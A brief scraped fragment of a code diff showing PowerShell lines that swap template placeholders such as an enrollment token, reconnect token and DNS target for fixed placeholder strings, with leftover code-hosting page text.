$template = $template.Replace('{{.EnrollToken}}', '__ENROLL_TOKEN__')
|
||||||
$template = $template.Replace('{{.ReconnectToken}}', '__RECONNECT_TOKEN__')
|
$template = $template.Replace('{{.ReconnectToken}}', '__RECONNECT_TOKEN__')
|
||||||
$template = $template.Replace('{{.DNSTarget}}', '__DNS_TARGET__')
|
$template = $template.Replace('{{.DNSTarget}}', '__DNS_TARGET__')
|
||||||
|
|||||||
Reference in New Issue
Block a user